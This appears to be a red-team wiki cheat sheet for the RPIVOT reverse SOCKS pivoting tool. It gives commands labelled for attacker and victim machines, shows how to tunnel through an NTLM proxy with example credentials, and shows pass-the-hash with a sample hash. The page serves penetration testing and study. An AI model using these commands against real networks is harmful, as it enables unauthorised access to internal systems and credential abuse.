Rpivot

From RCATs

Description

RPIVOT is a tool that provides secure and flexible access to an internal network by tunneling traffic through a SOCKS 4 proxy. It operates in the opposite direction of SSH dynamic port forwarding, allowing you to pivot into an internal network from an external system. RPIVOT provides a convenient way to bypass network restrictions and gain access to internal resources without the need for direct connections. This tool is particularly useful for penetration testers, security professionals, and network administrators who need to access internal networks from remote locations.

Commands

Basic Usage[1]

# Attacker Machine
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

# Victim Machine
python client.py --server-ip <rpivot_server_ip> --server-port 9999

Pivot Through NTLM Proxy

python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd

Pass The Hash

python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45

More Commands

# Attack host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

References